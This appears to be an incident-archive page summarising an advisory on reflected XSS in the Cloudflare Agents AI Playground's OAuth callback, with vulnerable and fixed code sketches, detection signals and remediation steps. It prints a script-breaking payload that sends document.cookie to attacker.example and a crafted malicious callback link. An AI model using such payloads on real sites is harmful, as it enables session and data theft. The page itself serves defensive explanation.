ASR AI Security Radar


AI security incident: Cloudflare Agents is Vulnerable to Reflected Cross-Site Scripting in the AI Playground

Incident date: February 13, 2026 | Published: February 25, 2026 | Source: GitHub Security Advisory | Classification confidence: 61%

This incident is part of the public archive and includes explicit AI-related signals from the cited source material. Review methodology.

Summary

A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the AI Playground's OAuth callback handler. The error_description query parameter was interpolated directly into an HTML script tag without proper escaping, allowing attackers to execute arbitrary JavaScript in the context of the victim's session.

Root Cause

The OAuth callback handler in site/ai-playground/src/server.ts directly interpolated the authError value, sourced from the error_description query parameter, into an inline script tag.

Impact

An attacker could craft a malicious link that, when clicked by a victim, would:

  • Steal user chat message history - Access all LLM interactions stored in the user's session.
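A minimal sketch of the pattern described above, assuming a handler that echoes error_description into an inline script block. The function names and HTML template are illustrative, not the actual Cloudflare Agents code; the fix shown (JSON-encoding plus escaping "<") is one standard mitigation for script-context injection.

```typescript
// VULNERABLE (sketch): the query parameter lands inside a <script> block
// unescaped, so a value containing "</script><script>..." terminates the
// original script element and injects attacker-controlled JavaScript.
function renderCallbackVulnerable(authError: string): string {
  return `<script>showError("${authError}");</script>`;
}

// FIXED (sketch): JSON-encode the value and escape "<" as \u003c so no
// payload can close the surrounding <script> element.
function renderCallbackFixed(authError: string): string {
  const safe = JSON.stringify(authError).replace(/</g, "\\u003c");
  return `<script>showError(${safe});</script>`;
}

const payload = '</script><script>alert(document.cookie)</script>';
const vulnerable = renderCallbackVulnerable(payload);
const fixed = renderCallbackFixed(payload);
```

With the fix applied, the payload reaches the page only as an inert JavaScript string literal; an even safer design avoids inline scripts entirely and passes the value via textContent or a JSON data attribute.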

Why This Is AI-Related

This page is treated as AI-specific because the source material references llm, which places the issue inside an AI workflow, model, assistant, or supporting dependency rather than a generic software bulletin.

  • llm

Affected Workflow

Review the AI product, dependency, and integration points mentioned in the source advisory before broadening remediation.

Likely Attack Path

The advisory describes a reflected XSS path: an attacker crafts an OAuth callback link with a malicious error_description value, a victim clicks it, and the injected script executes in the victim's session, exposing AI chat history and other session data if the component is deployed.
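The attack path can be sketched as follows. The callback host and path here are placeholders for illustration, not the real AI Playground endpoint:

```typescript
// The attacker embeds script-breaking markup in error_description; when the
// vulnerable handler reflects it, the injected script exfiltrates session data.
const payload =
  '</script><script>new Image().src=' +
  '"https://attacker.example/?c="+document.cookie</script>';

// The crafted link the victim would be lured into clicking.
const maliciousLink =
  'https://playground.example/oauth/callback' +
  '?error=access_denied' +
  '&error_description=' + encodeURIComponent(payload);
```

The payload is URL-encoded in transit, so perimeter filters looking for literal "&lt;script&gt;" strings in raw URLs can miss it; it is decoded back into markup only when the server reads the query parameter.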

Impact

The advisory has meaningful security implications for an AI-related product, dependency, or workflow and should be triaged against deployed usage.

  • Severity: HIGH
  • Classification confidence: 61%
  • Source channel: GHSA

Detection And Triage Signals

  • New security events tied to the affected component or advisory identifier
  • Changes in AI workflow behavior, access logs, or plugin execution after the advisory window
  • Evidence that the vulnerable version is active in environments that process sensitive data
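One way to screen for the second signal is to scan access-log URLs from the advisory window for OAuth callback requests whose error_description decodes to markup. This is a triage sketch; the callback URL shape is an assumption, not taken from the advisory:

```typescript
// Flag callback URLs whose error_description parameter decodes to HTML
// markup or a javascript: URL — both are out of place in a legitimate
// OAuth error message. searchParams.get() percent-decodes the value.
function looksLikeXssAttempt(requestUrl: string): boolean {
  const desc = new URL(requestUrl).searchParams.get("error_description") ?? "";
  return /<|javascript:/i.test(desc);
}
```

Running this over logs from before and after the advisory window separates background noise from targeted probing of the vulnerable parameter.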

Recommended Response

  • Confirm whether affected products, models, or integrations are used in your environment.
  • Apply vendor fixes or mitigations and restrict risky permissions until verified.
  • Monitor logs for related indicators and document containment for audit evidence.

Compliance And Business Impact

Even when exploit details are still emerging, delayed triage can widen operational and compliance exposure around AI systems.

Sources
